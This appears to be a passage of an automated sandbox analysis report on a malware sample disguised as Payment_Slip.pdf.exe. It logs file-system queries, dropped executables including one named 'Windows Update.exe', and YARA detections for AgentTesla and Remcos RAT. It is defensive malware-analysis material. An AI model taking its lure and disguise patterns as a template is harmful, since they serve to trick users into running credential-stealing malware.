Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Queries volume information: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe	Queries volume information: C:\Users\user\AppData\Roaming\host.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\conserver.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_0040A0B0 GetLocalTime,wsprintfW,

11_2_0040A0B0

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_004195F8 GetUserNameW,

11_2_004195F8

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_004466BF

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Code function: 14_2_0041739B GetVersionExW,

14_2_0041739B

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 12.0.host.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.1218869543.0000000000242000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\host.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Remcos RAT

Source: Yara match	File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
